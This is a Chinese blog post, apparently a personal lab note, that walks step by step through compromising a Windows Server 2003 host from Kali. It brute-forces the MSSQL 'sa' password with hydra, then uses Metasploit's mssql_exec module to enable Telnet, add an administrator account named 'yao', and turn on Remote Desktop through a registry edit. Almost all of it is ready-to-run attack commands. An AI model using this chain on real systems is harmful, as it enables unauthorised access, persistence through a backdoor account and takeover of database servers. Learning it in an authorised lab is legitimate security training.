Qing

mssql开启telnet 获取CMD开启windows远程连接 --mssql_exec模块(msf)
攻击机:kaili靶机:windows server 2003打开kaili 启动msfconsole调用模块(...
扫描右侧二维码阅读全文
04
2019/03

mssql开启telnet 获取CMD开启windows远程连接 --mssql_exec模块(msf)

攻击机:kaili

靶机:windows server 2003

打开kaili 启动msfconsole

调用模块(mssql_exec)

use auxiliary/admin/mssql/mssql_exec #调用mssql_exec模块
show options #查看模块使用**

调用mssql_exec 模块,show options

设置目标地址(RHOST):

最新版本的应该是RHOSTS,老版本的是RHOST

set rhost 192.168.0.20 #设置目标地址

对了,忘记破解密码了,这也就是利用mysql的数据库账号来进行windows的CMD权限渗透,我自己理解的emmm

自己在root下编写个1.txt的密码文档,有现成的也行,我目前我知道数据库的密码,所以我写个简单的密码文件就行,利用hydra这个命令,在新窗口输入,hydra这个命令我也得好好熟悉熟悉

爆破密码: 利用hydra用字典爆破

hydra -l sa -P /root/1.txt mssql://192.168.0.20 
#sa是默认用户名,往下看就知道,mssql_exec 模块默认用户名

hydra爆破密码

然后爆破完密码,继续刚才的设置完目标地址后,

设置之前爆破出来的密码(PASSWORD)

还是进入那个模块(mssql_exec),输入指令

set password 123456

设置passowrd

继续,设置Telnet 服务开启

#设置Telnet服务自动开启
set CMD cmd.exe/c sc config TlnSvr start= auto 
#运行一次
run

设置Telnet服务自动开启

继续,开启Telnet端口(23)

#开启Telnet
set CMD cmd.exe /c net start telnet 
#运行一次
run

到最后几步了,添加远程用户,然后就可以用过Telnet连接到windows的CMD,

#添加windows远程用户
set CMD cmd.exe /c net user yao 123123 /add&net localgroup administrators yao /add

  • 注意administrators要加s,不能在忘了!
  • yao是用户名
  • 123123是密码
  • localgroup是组
  • 用kaili Telnet连接不能退格

添加远程用户,我这里账号和密码写错了

然后使用Telnet远程连接windows的CMD,开启远程连接-3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
#CMD命令,开启远程连接3389端口

  • /v #路径
  • /t #名称
  • /d #类型
  • /f #值

仅作个人参考

最后修改:2019 年 04 月 06 日 02 : 34 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论